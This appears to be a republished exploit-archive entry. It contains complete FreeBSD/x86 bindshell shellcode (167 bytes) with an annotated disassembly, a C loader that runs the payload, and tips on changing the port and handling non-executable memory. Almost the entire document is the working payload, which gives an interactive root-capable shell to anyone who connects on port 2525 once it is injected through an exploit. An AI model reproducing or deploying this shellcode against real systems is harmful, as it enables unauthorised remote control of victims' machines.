bsd/x86 bindshell on port 2525 shellcode, 167 bytes (FreeBSD, not null-free)
来源:beosroot@hotmail.fr 作者:beosroot 发布时间:2010-04-23  
==================================================
bsd/x86 bindshell on port 2525 shellcode, 167 bytes (FreeBSD, not null-free)
==================================================


/*
-------------- bsd/x86 bindshell on port 2525, 167 bytes -------------------------
*  AUTHOR : beosroot
*   OS    : BSD/x86 (tested on FreeBSD; uses FreeBSD syscall numbers and the
*           BSD int $0x80 calling convention with a dummy return-address slot)
*   EMAIL : beosroot@hotmail.fr
             beosroot@null.net
*  NOTE   : the payload contains 0x00 bytes, so it must be delivered by a
*           length-based copy (memcpy/read), not by str*-style functions.
*  GR33TZ To : joseph-h, str0ke, MHIDO55,.....
*/

/*
 * Raw bindshell payload for FreeBSD/x86, 167 bytes. Syscall sequence:
 *   socket(AF_INET, SOCK_STREAM, 0) -> bind(s, {sin_len=16, AF_INET, port 2525,
 *   INADDR_ANY}, 16) -> listen(s, 1) -> accept(s, &client_sa, &len) -> close(s)
 *   -> dup2(c, 0) / dup2(c, 1) / dup2(c, 2)
 *   -> execve("/bin/sh", {"sh", "-i", NULL}, NULL)
 *
 * Calling convention (BSD int $0x80): arguments are pushed right-to-left,
 * one extra word is pushed (push %eax) to stand in for the return-address
 * slot, the syscall number goes in %eax via push/pop, then int $0x80.
 * Descriptors are kept on the stack and re-read with "pushl N(%esp)"; the
 * displacements therefore depend on the exact push history, so the bytes
 * below cannot be reordered or removed without recomputing them.
 *
 * No return value is checked: if socket()/bind()/accept() fails (port 2525
 * already in use, etc.) the code carries on with whatever %eax holds.
 *
 * The payload is NOT null-free ("\x6a\x00", "\x68\x73\x68\x00\x00", ...),
 * so it only survives length-based copies, not strcpy()-style delivery.
 * The listening port is the big-endian half-word 0x09dd (= 2525) inside
 * the "\x68\x10\x02\x09\xdd" push; change those two bytes to rebind it.
 *
 * Disassembly comments are AT&T syntax; "N(%esp)" is the word at %esp+N.
 */
const char shellcode[] =
    /* socket(AF_INET, SOCK_STREAM, 0) -> %eax = s */
    "\x6a\x00"                  // push   $0x0              ; protocol = 0
    "\x6a\x01"                  // push   $0x1              ; SOCK_STREAM
    "\x6a\x02"                  // push   $0x2              ; AF_INET
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x61"                  // push   $0x61             ; SYS_socket (97)
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x50"                      // push   %eax              ; save s on the stack
    /* build struct sockaddr_in on the stack, then bind(s, &sa, 16) */
    "\x6a\x00"                  // push   $0x0              ; sin_zero / sin_addr = INADDR_ANY
    "\x6a\x00"                  // push   $0x0
    "\x6a\x00"                  // push   $0x0
    "\x6a\x00"                  // push   $0x0
    "\x68\x10\x02\x09\xdd"      // push   $0xdd090210       ; sin_len=0x10, sin_family=2, sin_port=0x09dd (2525)
    "\x89\xe0"                  // mov    %esp,%eax         ; %eax = &sa
    "\x6a\x10"                  // push   $0x10             ; addrlen = 16
    "\x50"                      // push   %eax              ; &sa
    "\xff\x74\x24\x1c"          // pushl  0x1c(%esp)        ; s (saved above)
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x68"                  // push   $0x68             ; SYS_bind (104)
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    /* listen(s, 1) */
    "\x6a\x01"                  // push   $0x1              ; backlog = 1
    "\xff\x74\x24\x28"          // pushl  0x28(%esp)        ; s
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x6a"                  // push   $0x6a             ; SYS_listen (106)
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    /* accept(s, &client_sa, &addrlen) -> %eax = c */
    "\x83\xec\x10"              // sub    $0x10,%esp        ; 16-byte buffer for the client sockaddr
    "\x6a\x10"                  // push   $0x10             ; addrlen = 16
    "\x8d\x44\x24\x04"          // lea    0x4(%esp),%eax    ; %eax = &client_sa
    "\x89\xe1"                  // mov    %esp,%ecx         ; %ecx = &addrlen
    "\x51"                      // push   %ecx              ; &addrlen
    "\x50"                      // push   %eax              ; &client_sa
    "\xff\x74\x24\x4c"          // pushl  0x4c(%esp)        ; s
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x1e"                  // push   $0x1e             ; SYS_accept (30)
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    /* close(s): drop the listening socket, keep c */
    "\x50"                      // push   %eax              ; save c on the stack
    "\xff\x74\x24\x58"          // pushl  0x58(%esp)        ; s
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x06"                  // push   $0x6              ; SYS_close (6)
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    /* dup2(c, 0), dup2(c, 1), dup2(c, 2): wire the shell's stdio to the client */
    "\x6a\x00"                  // push   $0x0              ; newfd = stdin
    "\xff\x74\x24\x0c"          // pushl  0xc(%esp)         ; c
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x5a"                  // push   $0x5a             ; SYS_dup2 (90)
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x01"                  // push   $0x1              ; newfd = stdout
    "\xff\x74\x24\x18"          // pushl  0x18(%esp)        ; c
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x5a"                  // push   $0x5a             ; SYS_dup2 (90)
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x02"                  // push   $0x2              ; newfd = stderr
    "\xff\x74\x24\x24"          // pushl  0x24(%esp)        ; c
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x5a"                  // push   $0x5a             ; SYS_dup2 (90)
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    /* execve("/bin/sh", {"sh", "-i", NULL}, NULL) */
    "\x68\x73\x68\x00\x00"      // push   $0x6873           ; "sh\0\0"
    "\x89\xe0"                  // mov    %esp,%eax         ; %eax = "sh"
    "\x68\x2d\x69\x00\x00"      // push   $0x692d           ; "-i\0\0"
    "\x89\xe1"                  // mov    %esp,%ecx         ; %ecx = "-i"
    "\x6a\x00"                  // push   $0x0              ; argv[2] = NULL
    "\x51"                      // push   %ecx              ; argv[1] = "-i"
    "\x50"                      // push   %eax              ; argv[0] = "sh"
    "\x68\x2f\x73\x68\x00"      // push   $0x68732f         ; "/sh\0"
    "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f       ; "/bin"  -> "/bin/sh\0" at %esp
    "\x89\xe0"                  // mov    %esp,%eax         ; %eax = path
    "\x8d\x4c\x24\x08"          // lea    0x8(%esp),%ecx    ; %ecx = argv (skips the 8 path bytes)
    "\x6a\x00"                  // push   $0x0              ; envp = NULL
    "\x51"                      // push   %ecx              ; argv
    "\x50"                      // push   %eax              ; path
    "\x50"                      // push   %eax              ; dummy return-address slot
    "\x6a\x3b"                  // push   $0x3b             ; SYS_execve (59)
    "\x58"                      // pop    %eax
    "\xcd\x80";                 // int    $0x80

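/*
 * Test harness: transfers control straight into the payload bytes.
 *
 * Returns only if the payload itself returns, which it normally does not
 * (a successful execve replaces the process image); the value of a failed
 * run is whatever the payload left in %eax.
 *
 * Casting an object pointer to a function pointer is not strictly
 * conforming C, but it is the usual shellcode-loader idiom. `shellcode` is
 * a const array and so lives in a read-only data section; on any build
 * where data pages are mapped non-executable (NX / W^X) the first fetch
 * faults before a single instruction runs. To test on such a system copy
 * the bytes into a mapping created with PROT_READ|PROT_WRITE|PROT_EXEC (or
 * mprotect() the page) and call that copy instead.
 */
int main(void)
{
    /* Single typed function pointer instead of an unused `void (*)()`
     * temporary plus a second inline cast at the call site. */
    int (*payload)(void) = (int (*)(void))shellcode;

    return payload();
}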



// the end o.O





 